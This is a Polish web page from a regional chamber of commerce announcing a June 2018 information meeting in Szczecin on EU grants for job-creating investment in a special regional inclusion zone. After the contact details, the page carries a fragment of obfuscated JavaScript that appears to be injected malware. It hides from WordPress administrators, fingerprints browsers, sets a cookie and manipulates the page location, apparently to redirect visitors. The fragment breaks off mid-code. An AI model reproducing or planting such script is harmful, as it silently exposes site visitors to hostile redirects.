Spotkanie informacyjne w ramach działania 1.6 Tworzenie nowych miejsc pracy na obszarze Specjalnej Strefy Włączenia Regionalnego | Północna Izba Gospodarcza w Koszalinie

Szanowni Państwo,

działający przy Urzędzie Marszałkowskim Województwa Zachodniopomorskiego Główny Punkt Informacyjny Funduszy Europejskich w Szczecinie jest organizatorem licznych spotkań informacyjnych skierowanych do przedsiębiorców działających na terenie naszego regionu.  Spotkania dotyczą przede wszystkim możliwości pozyskania wsparcia w ramach Funduszy Europejskich.

Już 8 czerwca 2018 r. odbędzie się kolejne spotkanie informacyjne w Szczecinie dotyczące zasad aplikowania w ramach działania 1.6 Tworzenie nowych miejsc pracy na obszarze Specjalnej Strefy Włączenia Regionalnego Programu Operacyjnego Województwa Zachodniopomorskiego na lata 2014-2020. W ramach konkursu wspierane będą inwestycje prowadzące do stworzenia znaczącej liczby trwałych miejsc pracy oraz podniesienia konkurencyjności mikro, małych i średnich przedsiębiorstw działających na obszarze Specjalnej Strefy Włączenia(SSW), której poglądową mapkę załączam do niniejszej wiadomości. Dofinansowaniu będą podlegały projekty dotyczące zarówno działalności produkcyjnej, jak i działalności usługowej przedsiębiorstwa, zlokalizowane na obszarze SSW, obejmujące inwestycje w grunty, budynki, budowle, nowoczesne maszyny
i urządzenia, linie produkcyjne, wartości niematerialne i prawne, czy wdrażanie nowych rozwiązań technologicznych, prowadzące do:

  • budowy/rozbudowy przedsiębiorstwa,
  • wykreowania nowego lub zasadniczo ulepszonego produktu,
  • zwiększenia efektywności produkcji przedsiębiorstwa,
  • zasadniczej zmiany procesu produkcyjnego,

Maksymalny poziom dofinansowania na jaki mogą liczyć przedsiębiorcy to aż 55% wydatków kwalifikujących się do wsparcia.

Na koniec zachęcam do udziału w realizowanych przez nas szkoleniach w zakresie wsparcia z Funduszy Europejskich. Informacje o nich odnaleźć można pod adresem strony internetowej www.rpo.wzp.pl w zakładce „Weź udział w szkoleniach i konferencjach”. Polecam również nasz profil na Facebook’u www.facebook.com/gpiszczecin/.

W przypadku dodatkowych pytań zapraszam do ponownego kontaktu.

 

Główny Punkt Informacyjny w Szczecinie

Kuśnierska 12b, 70-536 Szczecin

e-mail: gpi@wzp.pl, infolinia: 800 34-55-34

godziny pracy: pn. 7:30 -17:30 wt.-pt. 7.30-15.30

www.rpo.wzp.pl, www.funduszeeuropejskie.gov.pl

  'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m